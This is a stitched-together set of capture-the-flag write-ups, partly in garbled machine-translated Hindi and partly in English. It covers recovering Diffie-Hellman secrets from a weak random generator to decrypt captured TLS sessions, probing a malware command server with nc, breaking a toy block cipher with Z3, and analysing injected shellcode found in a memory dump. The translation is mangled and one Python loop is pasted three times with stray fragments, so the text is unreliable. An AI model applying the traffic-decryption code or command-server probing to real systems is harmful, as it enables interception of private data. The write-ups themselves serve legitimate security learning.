0xFFFFFFFFLL; v8 = 0LL; v9 = 0LL; v10 = 0LL; OPENSSL_init_ssl(0LL, 0LL); OPENSSL_init_crypto(2048LL, 0LL); v11 = ENGINE_get_default_DH(2048LL, 0LL); if ( v11 ) { if ( (unsigned int)ENGINE_init(v11) ) { v12 = ENGINE_get_DH(v11); if ( v12 ) { v8 = DH_meth_dup(v12); if ( v8 ) { if ( (unsigned int)DH_meth_set_generate_key(v8, dh_1) ) { if ( (unsigned int)ENGINE_set_DH(v11, v8) ) { v5 = TLSv1_2_client_method(v11, v8); v10 = SSL_CTX_new(v5); if ( (unsigned int)SSL_CTX_set_cipher_list(v10, "DHE-RSA-AES128-SHA256") ) { v9 = BIO_new_ssl_connect(v10); BIO_ctrl(v9, 100LL, 0LL, (__int64)"ssltest.a1exdandy.me:443"); if ( BIO_ctrl(v9, 101LL, 0LL, 0LL) >= 0 ) { BIO_ctrl(v9, 101LL, 0LL, 0LL); BIO_printf(v9, "GET /flag.jpg HTTP/1.1\n", argv); BIO_printf(v9, "Host: ssltest.a1exdandy.me\n"); BIO_printf(v9, "Range: bytes=%d-%d\n\n", (unsigned int)v6, (unsigned int)v7); v4 = (signed int)BIO_read(v9, &ptr, 1024LL); fwrite(&ptr, v4, 1uLL, stdout); } else { v4 = 1LL; fwrite("Can't do connect\n", 1uLL, 0x11uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set cipher list\n", 1uLL, 0x16uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set DH methods\n", 1uLL, 0x15uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set generate_key method\n", 1uLL, 0x1EuLL, stderr); } } else { v4 = 1LL; fwrite("Can't dup dh meth\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } } else { v4 = 1LL; fwrite("Can't init engine\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } if ( v11 ) { ENGINE_finish(v11, v4); ENGINE_free(v11); } if ( v8 ) DH_meth_free(v8, v4); if ( v10 ) SSL_CTX_free(v10, v4); if ( v9 ) BIO_free_all(v9, v4); return 0LL; } 

   
   

   सर्वर पर ध्वज के साथ कोई चित्र नहीं थे, लेकिन डंप.कैप ssl ट्रैफ़िक का एक गुच्छा है, संभवतः चित्र के टुकड़ों के साथ। हार्दिक के लिए सर्वर की त्वरित जांच के बाद (यातायात को डिक्रिप्ट करने के लिए एक निजी कुंजी चोरी करने के लिए), यह पता चला कि सर्वर कमजोर नहीं है। इसके अलावा, SSL सत्रों में, ट्रैफ़िक डंप और क्लाइंट के अनुसार, DHE-RSA-AES128-SHA256 सिफर का उपयोग किया जाता है, जिसमें RSA का उपयोग केवल हस्ताक्षर करने के लिए किया जाता है, और इस मोड में निजी RSA सर्वर कुंजी के अनुसार डिफि-हेलमैन स्कीम के अनुसार कुंजियों का आदान-प्रदान किया जाता है। )।

   
   

2. थोड़ा सा पॉडबीर्स्टिव होने से सर्वर को फाइल https://ssltest.a1exdandy.me/x मिली, जो कि एक साधारण मैलवेयर है, इसमें एडमिन एड्रेस सीवन 0x82C780B2697A0002 (0x82C780B2: 0x7a69 = 178.128.199.130 ZIP133737) है। जब पोर्ट 31337 से जुड़ा, तो यह पता चला कि सर्वर 3 कमांड का समर्थन करता है, जिनमें से कुछ अतिरिक्त तर्क मांगते हैं

   
   

    nc 178.128.199.130 31337 Yet another fucking heap task... Command: 1-3 1 - Index: - Size: 2 - Index: 3 - Index: - Length: 

   
   

   लेकिन इस बंदरगाह के साथ और कुछ नहीं किया जा सकता था, और सबसे अधिक संभावना यह एक विचलित करने वाला कार्य था।

   
   

3. ग्राहक को ध्यान से देखने के बाद, मैंने देखा कि यह एक कस्टम डिफी-हेलमैन रहस्य जनरेटर का उपयोग करता है:

   
   

    int __fastcall rnd_work(__int64 a1) { __int64 v1; // rsi unsigned int i; // [rsp+10h] [rbp-10h] rnd_read(); BN_bin2bn(&RANDOM_512, 512LL, a1); BN_lshift1(a1, a1); v1 = (unsigned int)BITS_ind[0]; // BITS_ind dd 4096, 4095, 4081, 4069, 0 if ( (unsigned int)BN_is_bit_set(a1, (unsigned int)BITS_ind[0]) ) { for ( i = 0; i <= 4; ++i ) { if ( (unsigned int)BN_is_bit_set(a1, (unsigned int)BITS_ind[i]) ) { v1 = (unsigned int)BITS_ind[i]; BN_clear_bit(a1, v1); } else { v1 = (unsigned int)BITS_ind[i]; BN_set_bit(a1, v1); } } } if ( (unsigned int)((signed int)((unsigned __int64)BN_num_bits(a1) + 7) / 8) > 0x200 ) { printf("Err!", v1); exit(0); } BN_bn2binpad(a1, &RANDOM_512, 512LL); return rnd_write(); } 

   
   

   प्रारंभ में, एक गुप्त (512 बाइट्स) / dev / urandom से पढ़ सकते हैं और फ़ाइल राज्य में संग्रहीत। हर बार जब आप एक गुप्त का अनुरोध यहां इस तरह के जादू है:

   
   

    XOR = 2**4096 + 2**4095 + 2**4081 + 2**4069 + 1 CMP = 2**4096 state *= 2 if state > CMP: state ^= XOR 

   
   

   एक लंबी संख्या के रूप में रहस्य 1 बिट को बाईं ओर स्थानांतरित कर दिया गया है, और यदि सबसे महत्वपूर्ण बिट 1 था, तो संख्या 5 गैर-शून्य बिट्स (XOR) के निरंतर पर है।

   
   

Pcap को देखते हुए, मैंने देखा कि सर्वर से पहुंचने वाले डिफी-हेलमैन पैरामीटर स्थिर हैं:

 dh_g = 2 dh_p = 

और हर बार जब कोई कनेक्शन स्थापित होता है, तो क्लाइंट डिफी-हेलमैन के सार्वजनिक हिस्से को गुप्त भेजता है। पड़ोसी सत्रों के रहस्यों के सार्वजनिक भागों की तुलना करके, आप ग्राहक के प्रारंभिक रहस्य को पुनर्स्थापित कर सकते हैं, और फिर प्रत्येक के लिए बाद के सभी रहस्य:
यदि रहस्य का उच्चतम बिट 0 है, तो अगले सत्र में रहस्य बस 2 गुना बड़ा हो जाएगा, और सार्वजनिक भाग चुकता मोडुलो पी होगा। इस प्रकार, प्रारंभिक रहस्य (जो / देव / उरुग्मे से पढ़ा गया था) मोडुलो पी को बहाल करना संभव था:

212030266574081313400816495535550771039880390539286135828101869037345869420205997453325815053364595553160004790759435995827592517178474188665111332189420650868610567156950459495593726196692754969821860322110444674367830706684288723400924718718744572072716445007789955072532338996543460287499773137785071615174311774659549109541904654568673143709587184128220277471318155757799759470829597214195494764332668485009525031739326801550115807698375007112649770412032760122054527000645191827995252649714951346955180619834783531787411998600610075175494746953236628125613177997145650859163985984159468674854699901927080143977813208682753148280937687469933353788992176066206254339449062166596095349440088429291135673308334245804375230115095159172312975679432750163246936266603077314220813042048063033927345613565227184333091534551071824033535159483541175958867122974738255966511008607723675431569961127852005437047813822454112416864211120323016008267853722731311026233323235121922969702016337164336853826598082855592007126727352041124911221048498141841625765390204460725231581416991152769176243658310857769293168120450725070030636638954553866903537931113666283836250525318798622872347839391197939468295124060629961250708172499966110406527347

और इससे सभी अन्य सत्रों के लिए रहस्यों की गणना करना आसान है।

और यहाँ समस्याएं थीं:
ए) वाइफ़शार्क एसएससी को डिक्रिप्ट करने में सक्षम नहीं है, डिफी-हेलमैन के रहस्यों को जानते हुए, और कोई तैयार समाधान नहीं थे। यह साझा रहस्य Diffie-Hellman (उर्फ पूर्व सत्र स्वामी कुंजी) की गणना करने के लिए उपयोगी है, और यह के माध्यम से एक बड़ी साइकिल की मदद से एक मास्टर चाबी खोजने के लिए सत्र (नहीं बाइक एसएसएल के लिए सोचा था)। इसके बाद, आप एक SSLKEYLOG फ़ाइल बना सकते हैं जिसमें क्लाइंट को यादृच्छिक (प्रत्येक ssl सत्र में) लिखने के लिए और मास्टर कुंजी, इसे SSL डिक्रिप्शन और सैद्धांतिक रूप से लाभ के लिए वायरशर्क सेटिंग्स में निर्दिष्ट करें।

लेकिन कुछ और समस्याएं सामने आईं:
बी) PHP बहुत धीमी गति से माना जाता है ( bcadd , bcpowmod फ़ंक्शंस का उपयोग नहीं किया जाता है ...), मैंने इसे अजगर में फिर से लिखने का फैसला किया।
सी) सूत्र मनुष्य के रूप में स्वामी कुंजी पूर्व स्वामी कुंजी पर नहीं पाया जा सका, sortsy ssl प्रदर्शित openssl मध्यवर्ती गणना के परिणाम भी विफल रहा है बनाने के लिए बहुत मेहनत से समझा। परिणामस्वरूप, मैंने इस कोड , विवरण और कुछ प्रकार के RFC का उपयोग किया:

नतीजतन, आधे दिन के बाद मैं इसे बनाने में सक्षम था (मेरे लिए, यह साइकिल के बिना नहीं कर सकता):

 for i in xrange(0, 4264): dh_secret = pow(srv_pubkeys[i], state, dh_p) dh_secret = hex(dh_secret)[2:-1] if len(dh_secret) % 2 : dh_secret = "0"+dh_secret while dh_secret[0:2] == "00": dh_secret = dh_secret[2:] dh_secret = dh_secret.decode("hex") seed = "master secret"+(cl_random[i].strip() + srv_random[i].strip()).decode("hex") A = seed master_key = "" for j in xrange(0, 2): A = hmac.new(dh_secret, A, hashlib.sha256).digest() master_key += hmac.new(dh_secret, A+seed, hashlib.sha256).digest() master_key = master_key[0:48].encode("hex") print "CLIENT_RANDOM " + cl_random[i].strip() + " " + master_key state *= 2 if state > CMP: state ^= XOR , राज्य, dh_p) for i in xrange(0, 4264): dh_secret = pow(srv_pubkeys[i], state, dh_p) dh_secret = hex(dh_secret)[2:-1] if len(dh_secret) % 2 : dh_secret = "0"+dh_secret while dh_secret[0:2] == "00": dh_secret = dh_secret[2:] dh_secret = dh_secret.decode("hex") seed = "master secret"+(cl_random[i].strip() + srv_random[i].strip()).decode("hex") A = seed master_key = "" for j in xrange(0, 2): A = hmac.new(dh_secret, A, hashlib.sha256).digest() master_key += hmac.new(dh_secret, A+seed, hashlib.sha256).digest() master_key = master_key[0:48].encode("hex") print "CLIENT_RANDOM " + cl_random[i].strip() + " " + master_key state *= 2 if state > CMP: state ^= XOR + बीज, hashlib.sha256) .digest () for i in xrange(0, 4264): dh_secret = pow(srv_pubkeys[i], state, dh_p) dh_secret = hex(dh_secret)[2:-1] if len(dh_secret) % 2 : dh_secret = "0"+dh_secret while dh_secret[0:2] == "00": dh_secret = dh_secret[2:] dh_secret = dh_secret.decode("hex") seed = "master secret"+(cl_random[i].strip() + srv_random[i].strip()).decode("hex") A = seed master_key = "" for j in xrange(0, 2): A = hmac.new(dh_secret, A, hashlib.sha256).digest() master_key += hmac.new(dh_secret, A+seed, hashlib.sha256).digest() master_key = master_key[0:48].encode("hex") print "CLIENT_RANDOM " + cl_random[i].strip() + " " + master_key state *= 2 if state > CMP: state ^= XOR 

डी) विभिन्न क्लाइंट को रैंडम करने के लिए ..., विंडसरक सत्रों से, सीएसवी को निर्यात का उपयोग किया गया और सीएसवी में "" ... के रूप में जो मिला, उसके लिए कच्चे ट्रैफ़िक में खोज की।

ई) 4264 सत्रों को डिक्रिप्ट करने के लिए, वायरशर्क ने बहुत सारे गीगाबाइट ऑपरेटिव खाने का फैसला किया (8 उसके लिए पर्याप्त नहीं था), लेकिन कुछ भी नहीं, आप एक शक्तिशाली कंप्यूटर पर सब कुछ चला सकते हैं, और एक कमजोर लैपटॉप पर नहीं। हालाँकि, जब http ऑब्जेक्ट्स (किसी चित्र के डिक्रिप्टेड टुकड़े) को निर्यात करते हैं तो वायरशर्क केवल पहली 1000 फाइलों को बचा सकता है, और फिर इसकी संख्या समाप्त हो जाती है। नतीजतन, यह 5 भागों प्रत्येक में 1000 टीसीपी-सत्र में PCAP विभाजित करने के लिए जरूरी हो गया था। परिणाम सभी टुकड़ों को देखने के बाद इतनी सुंदर तस्वीर थी:

परिचय

दान दो फ़ाइलों लॉकर और secret.png.enc साथ संग्रहीत करें।

पहली फ़ाइल लिनक्स x86-64 के लिए एक ईएलएफ है , जो इनपुट के रूप में एक फ़ाइल और एक एन्क्रिप्शन कुंजी प्राप्त करता है, और दूसरा एक एन्क्रिप्टेड पीएनजी छवि है।

 # ./locker Required option 'input' missing Usage: ./locker [options] Options: -i, --input in.png Input file path -o, --output out.png.enc Output file path -k, --key 0004081516234200 Encryption key in hex -h, --help Print this help menu 

लॉकर

आईडीए के लिए फ़ाइल का विश्लेषण करने के बाद, हम परियोजना :: मुख्य कार्य में एन्क्रिप्शन एल्गोरिथ्म पाते हैं।

इसका अध्ययन करने के बाद, हम समझते हैं कि यह एक ब्लॉक सिफर (ईसीबी) है, जिसमें 32 बिट्स का ब्लॉक आकार, 64 बिट्स का एक कुंजी आकार और 77 के राउंड की संख्या है।

पायथन संस्करण

 def encrypt(p, k, rounds=77): for i in range(0, rounds): n = (p >> 4) & 1 n |= (p >> 26) & 0xE0 n |= (p >> 22) & 0x10 n |= (p >> 13) & 8 n |= (p >> 7) & 4 n |= (p >> 4) & 2 x = p ^ k x ^= p >> 12 x ^= p >> 20 x &= 1 y = 1 << n y &= 0xBB880F0FC30F0000 y >>= n y &= 1 if x == y: p &= 0xFFFFFFFE else: p |= 1 k = ror(k, 1, 64) p = ror(p, 1, 32) return p 

गुप्त कुंजी

हम जानते हैं कि एन्क्रिप्ट की गई फ़ाइल एक PNG छवि है।
तदनुसार, हम फ़ाइल हेडर के रूप में प्लेनटेक्स्ट सिफरटेक्ट के एक जोड़े को जानते हैं (यह पीएनजी के लिए मानक है)।

आइए सरल तरीके से प्रयास करें और एन्क्रिप्शन कुंजी को खोजने के लिए श्रीमती सॉल्वर ( जेड 3 ) का उपयोग करें।
ऐसा करने के लिए, कोड को थोड़ा संशोधित करें और इनपुट को एक जोड़ी सादा टेक्स्ट सिफरटेक्स्ट में जमा करें।

task6_key.py

 import sys import struct from z3 import * # PNG file signature (8 bytes) + IHDR chunk header (8 bytes) PLAIN_TEXT = b'\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52' BLOCK_SIZE = 4 def encrypt(p, k, rounds=77): for i in range(0, rounds): n = LShR(p, 4) & 1 n |= LShR(p, 26) & 0xE0 n |= LShR(p, 22) & 0x10 n |= LShR(p, 13) & 8 n |= LShR(p, 7) & 4 n |= LShR(p, 4) & 2 x = k ^ ZeroExt(32, p) x ^= LShR(ZeroExt(32, p), 12) x ^= LShR(ZeroExt(32, p), 20) x &= 1 y = 1 << ZeroExt(32, n) y &= 0xBB880F0FC30F0000 y = LShR(y, ZeroExt(32, n)) y &= 1 p = If(x == y, p & 0xFFFFFFFE, p | 1) p = RotateRight(p, 1) k = RotateRight(k, 1) return p def qword_le_to_be(v): pv = struct.pack('<Q', v) uv = struct.unpack('>Q', pv) return uv[0] if len(sys.argv) < 2: sys.exit('no input file specified') with open(sys.argv[1], 'rb') as encrypted_file: k = BitVec('k', 64) key = k solver = Solver() for i in range(0, len(PLAIN_TEXT), BLOCK_SIZE): # prepare plain text and cipher text pairs pt = struct.unpack('<L', PLAIN_TEXT[i:i + BLOCK_SIZE])[0] ct = struct.unpack('<L', encrypted_file.read(BLOCK_SIZE))[0] p = BitVecVal(pt, 32) e = BitVecVal(ct, 32) solver.add(encrypt(p, k) == e) print('solving ...') if solver.check() == sat: encryption_key = solver.model()[key].as_long() print('key: %016X' % qword_le_to_be(encryption_key)) 

समाधान:

 > python task6_key.py "secret.png.enc" solving ... key: AE34C511A8238BCC 

Unlocker

.
.

task6_unlocker.py

 import sys import time import struct import binascii BLOCK_SIZE = 4 ror = lambda val, r_bits, max_bits: \ ((val & (2**max_bits-1)) >> r_bits%max_bits) | \ (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) rol = lambda val, r_bits, max_bits: \ (val << r_bits%max_bits) & (2**max_bits-1) | \ ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits))) def decrypt(e, k, rounds=77): dk = ror(k, 13, 64) for i in range(0, rounds): dk = rol(dk, 1, 64) e = rol(e, 1, 32) n = (e >> 4) & 1 n |= (e >> 26) & 0xE0 n |= (e >> 22) & 0x10 n |= (e >> 13) & 8 n |= (e >> 7) & 4 n |= (e >> 4) & 2 x = e ^ dk x ^= e >> 12 x ^= e >> 20 x &= 1 y = 1 << n y &= 0xBB880F0FC30F0000 y >>= n y &= 1 if x == y: e &= 0xFFFFFFFE else: e |= 1 return e if len(sys.argv) < 2: sys.exit('no input file specified') elif len(sys.argv) < 3: sys.exit('no output file specified') elif len(sys.argv) < 4: sys.exit('no encryption key specified') try: key = binascii.unhexlify(sys.argv[3]) key = struct.unpack('<Q', key)[0] except: sys.exit('non-hexadecimal encryption key') print('unlocking ...') start_time = time.time() with open(sys.argv[1], 'rb') as ef: with open(sys.argv[2], 'wb') as df: while True: ct = ef.read(BLOCK_SIZE) if not ct: break ct = struct.unpack('<L', ct)[0] pt = decrypt(ct, key) pt = struct.pack('<L', pt) df.write(pt) print('done, took %.3f seconds.' % (time.time() - start_time)) 

, .

 > python task6_unlocker.py "secret.png.enc" "secret.png" "AE34C511A8238BCC" unlocking ... done, took 49.669 seconds. 

secret.png

ZN{RA$T0GR@PHY_H3RTS}

Something that looks like VirtualBox RAM dump is provided to us.

We can try volatility, but it seems that it unable to locate required structures to restore Virtual Memory layout.

No process memory for us today, so we will have to work with fragmented memory.

First of all let's precache strings from the dump.

 strings > strings_ascii.txt strings -el > strings_wide.txt 

Most interesting one is command execution log:

 cd .. .\injector.exe 192.168.1.65 .\run.exe .\storage cd .\server\ .\run.exe block1 .\run.exe block0 cd Z:\zn_2019\ cd .\server\ cd .. .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd .. touch echo echo qwe echo qwe > flag.txt .\injector.exe 192.168.1.65 echo qwe > flag.txt .\injector.exe 192.168.1.65 echo qwe > flag.txt .\injector.exe 192.168.1.65 echo qwe > flag.txt cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd Z:\zn_2019\ injector.exe 1921.68.1.65 injector.exe 192.68.1.65 ./injector.exe 192.68.1.65 .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd Z:\zn_2019\server\ run storage .\run.exe .\storage cd Z:\zn_2019\server\ .\run.exe block1 cd Z:\zn_2019\server\ .\run.exe block0 cd .. .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 cd Z:\zn_2019\ .\Injector2.exe 192.168.1.65 cd Z:\zn_2019\ .\injector.exe 192.168.1.65 .\injector2.exe 192.168.1.65 cd Z:\zn_2019\ .\Injector2.exe 192.168.1.65 '.\ConsoleApplication5 (2).exe' 192.168.1.65 

Not Important note:

Not sure what SIGN.MEDIA is, but it looks like a cached file list from VirtualBox Network Share (Is this from Windows Registry?).

 SIGN.MEDIA=138A400 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=138A400 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=138A400 zn_2019\Injector2.exe SIGN.MEDIA=138A400 zn_2019\Is_it_you_suspended_or_me.exe SIGN.MEDIA=138A400 zn_2019\NOTE1.exe SIGN.MEDIA=138A400 zn_2019\NOTE1.exe SIGN.MEDIA=138A400 zn_2019\With_little_debug.exe SIGN.MEDIA=138A400 zn_2019\im_spawned_you_so_i_should_kill_you.exe SIGN.MEDIA=138A400 zn_2019\injector.exe SIGN.MEDIA=138A400 zn_2019\nnnn.exe SIGN.MEDIA=138A400 zn_2019\not_so_sleepy_r_we.exe SIGN.MEDIA=138A400 zn_2019\note.exe SIGN.MEDIA=138A400 zn_2019\note2.exe SIGN.MEDIA=138A400 zn_2019\note3.exe SIGN.MEDIA=138A400 zn_2019\note4.exe SIGN.MEDIA=138A400 zn_2019\random.exe SIGN.MEDIA=138A400 zn_2019\z.exe SIGN.MEDIA=17582C zn_2019\Injector2.exe SIGN.MEDIA=17582C zn_2019\injector.exe SIGN.MEDIA=196C2 zn_2019\server\run.exe SIGN.MEDIA=1C176B0 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=1C176B0 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=1C176B0 zn_2019\Injector2.exe SIGN.MEDIA=1C176B0 zn_2019\injector.exe SIGN.MEDIA=1C176B0 zn_2019\note.exe SIGN.MEDIA=1C176B0 zn_2019\note2.exe SIGN.MEDIA=1C176B0 zn_2019\note3.exe SIGN.MEDIA=1C1D02C zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=1C1D02C zn_2019\ConsoleApplication5.exe SIGN.MEDIA=1C1D02C zn_2019\Injector2.exe SIGN.MEDIA=1C1D02C zn_2019\Is_it_you_suspended_or_me.exe SIGN.MEDIA=1C1D02C zn_2019\With_little_debug.exe SIGN.MEDIA=1C1D02C zn_2019\injector.exe SIGN.MEDIA=1C1D02C zn_2019\not_so_sleepy_r_we.exe SIGN.MEDIA=1C1D02C zn_2019\note.exe SIGN.MEDIA=1C1D02C zn_2019\note2.exe SIGN.MEDIA=1C1D02C zn_2019\note3.exe SIGN.MEDIA=1C1DAB0 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=1C1DAB0 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=1C1DAB0 zn_2019\Injector2.exe SIGN.MEDIA=1C1DAB0 zn_2019\With_little_debug.exe SIGN.MEDIA=1C1DAB0 zn_2019\injector.exe SIGN.MEDIA=1C1DAB0 zn_2019\note.exe SIGN.MEDIA=1C1DAB0 zn_2019\note2.exe SIGN.MEDIA=1C1DAB0 zn_2019\note3.exe SIGN.MEDIA=1C30058 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=1C30058 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=1C30058 zn_2019\Injector2.exe SIGN.MEDIA=1C30058 zn_2019\Is_it_you_suspended_or_me.exe SIGN.MEDIA=1C30058 zn_2019\With_little_debug.exe SIGN.MEDIA=1C30058 zn_2019\injector.exe SIGN.MEDIA=1C30058 zn_2019\injector.exe SIGN.MEDIA=1C30058 zn_2019\not_so_sleepy_r_we.exe SIGN.MEDIA=1C30058 zn_2019\note.exe SIGN.MEDIA=1C30058 zn_2019\note2.exe SIGN.MEDIA=1C30058 zn_2019\note3.exe SIGN.MEDIA=1C89400 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=1C89400 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=1C89400 zn_2019\Injector2.exe SIGN.MEDIA=1C89400 zn_2019\Is_it_you_suspended_or_me.exe SIGN.MEDIA=1C89400 zn_2019\NOTE1.exe SIGN.MEDIA=1C89400 zn_2019\With_little_debug.exe SIGN.MEDIA=1C89400 zn_2019\im_spawned_you_so_i_should_kill_you.exe SIGN.MEDIA=1C89400 zn_2019\injector.exe SIGN.MEDIA=1C89400 zn_2019\nnnn.exe SIGN.MEDIA=1C89400 zn_2019\not_so_sleepy_r_we.exe SIGN.MEDIA=1C89400 zn_2019\note.exe SIGN.MEDIA=1C89400 zn_2019\note.exe SIGN.MEDIA=1C89400 zn_2019\note2.exe SIGN.MEDIA=1C89400 zn_2019\note3.exe SIGN.MEDIA=1C89400 zn_2019\note4.exe SIGN.MEDIA=1C8A800 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=1C8A800 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=1C8A800 zn_2019\Injector2.exe SIGN.MEDIA=1C8A800 zn_2019\Is_it_you_suspended_or_me.exe SIGN.MEDIA=1C8A800 zn_2019\NOTE1.exe SIGN.MEDIA=1C8A800 zn_2019\With_little_debug.exe SIGN.MEDIA=1C8A800 zn_2019\im_spawned_you_so_i_should_kill_you.exe SIGN.MEDIA=1C8A800 zn_2019\injector.exe SIGN.MEDIA=1C8A800 zn_2019\nnnn.exe SIGN.MEDIA=1C8A800 zn_2019\not_so_sleepy_r_we.exe SIGN.MEDIA=1C8A800 zn_2019\note.exe SIGN.MEDIA=1C8A800 zn_2019\note2.exe SIGN.MEDIA=1C8A800 zn_2019\note3.exe SIGN.MEDIA=1C8A800 zn_2019\note4.exe SIGN.MEDIA=2D702C zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=3EDC2 zn_2019\server\a.exe SIGN.MEDIA=3EDC2 zn_2019\server\hui.exe SIGN.MEDIA=3EDC2 zn_2019\server\run.exe SIGN.MEDIA=4482C zn_2019\ConsoleApplication5.exe SIGN.MEDIA=4482C zn_2019\PEview.exe SIGN.MEDIA=5B0058 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=5B0058 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=5B0058 zn_2019\Injector2.exe SIGN.MEDIA=5B0058 zn_2019\injector.exe SIGN.MEDIA=5B0058 zn_2019\note.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\Discord.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\Far.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\FileZillaFTPclient.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\InputDirector.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\KeePass.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\PicPick.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\Skype.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\UpdateManager.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\VBoxManager.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\idaq.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\javaw.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\lunix.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\paint.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\python3.7.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\r.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\svghost.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\tsm.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\usha.exe SIGN.MEDIA=A856FE8 zn_2019\server\hui\video_xxx_kopati4_nadaval_ogurcov_kroshu.mp4.exe SIGN.MEDIA=AB82C zn_2019\ConsoleApplication5.exe SIGN.MEDIA=AB82C zn_2019\injector.exe SIGN.MEDIA=B06D4C64 zn_2019\server\a.exe SIGN.MEDIA=B06D4C64 zn_2019\server\hui.exe SIGN.MEDIA=B06D4C64 zn_2019\server\run.exe SIGN.MEDIA=B06D4C64 zn_2019\server\video_xxx_kopati4_nadaval_ogurcov_kroshu.mp4.exe SIGN.MEDIA=BA802 zn_2019\server\run.exe SIGN.MEDIA=E00058 zn_2019\ConsoleApplication5 (2).exe SIGN.MEDIA=E00058 zn_2019\ConsoleApplication5.exe SIGN.MEDIA=E00058 zn_2019\Injector2.exe SIGN.MEDIA=E00058 zn_2019\injector.exe SIGN.MEDIA=E00058 zn_2019\note.exe SIGN.MEDIA=E00058 zn_2019\note2.exe SIGN.MEDIA=E00058 zn_2019\note2.exe SIGN.MEDIA=E9982 zn_2019\server\run.exe 

I used my old tool to get filesystem structure out of NTFS records (a lot of FILE records usually cached in RAM).

data_storage is small enough to contain some resident $DATA inside FILE record, so we can extract it.

This file contains shellcode. All it does is resolving CreateNamedPipeA by hash using special function (see Figure below) and calling it with "\.\pipe\zn_shell_stor" argument.

I highlighted part of this function, this bytes can be used to located other 24 shellcodes inside memory dump.

One of shellcode #21 contained references to other, it is probably the main one.

 Global\vtHAjnNbCecOeNAnVeQFmdRw Global\jGzXXZJbXGPYniopljDEdwuD Global\jpBuyMNJzdnpwHimVlcBkwGo Global\ArlCJOxJFOKRkqOLcBhvjYqj Global\THxjCBohxSlNgCFbwJsHujqk Global\BOiJhsLFBuZdsFdCrLKEucpJ Global\iYxszVIFfsuzzEmGwgOQeEcb Global\NOluZoXPJalShopCCuNnWQbR Global\GCrtPmNEAOsZpSNNBdiYQfgz Global\pVVgeqcREhXSgKCwhkeyfTXw Global\trsQPehKvlxBJhEqIPtwzjxi Global\ngVrhgAEqcDssFsNerrAZsFz Global\KiZvGyiMnyTgvQdFNGcudfTY Global\FzXvKPKGCPMAERklFMXVMYga Global\nCZpFZPtyidhFOvVeemfyJAC Global\pjRmfOLLBXIbsJholoasvrqC Global\mhOVYcYRKgWdABAsgkvrcOOM Global\syGiShcLTXfQYGAAiafYBxoF Global\KbFVsPCPZrfVlUIQlvVoJLXW Global\XbuYiHCxQLTLApuToFldJIgI Global\auFqpIQAlsHcvjPEakqHyIeA Global\MrnXOMJvHmYBxRfkbLBUYWgn Global\GYVOmvrLhCpgQUPfnOshzzem Global\qaswedfrtghyujkiol121232 \\.\pipe\zn_shell_stor 

Every shellcode is started with CALL $+X instruction (E8 ?? ?? ?? ??), followed by data block and executable code. Code is looking for some functions and evaluates logic based on data read from pipe "\.\pipe\zn_shell_stor" .

Understanding of shellcode actions is a little bit hard because everything tied together via pipe (A calls B, B calls C and etc.). We are required to jump from one shellcode to another during reversing.

I decided to execute it all and see what happens. All shellcodes was saved as files bN , where N is a number in range from 1 to 24 in order of appearing in memory dump. Dump #21 is the main dispatcher (it must be loaded first). File C:\beeps\flag.txt should be present in system for #20 to work.

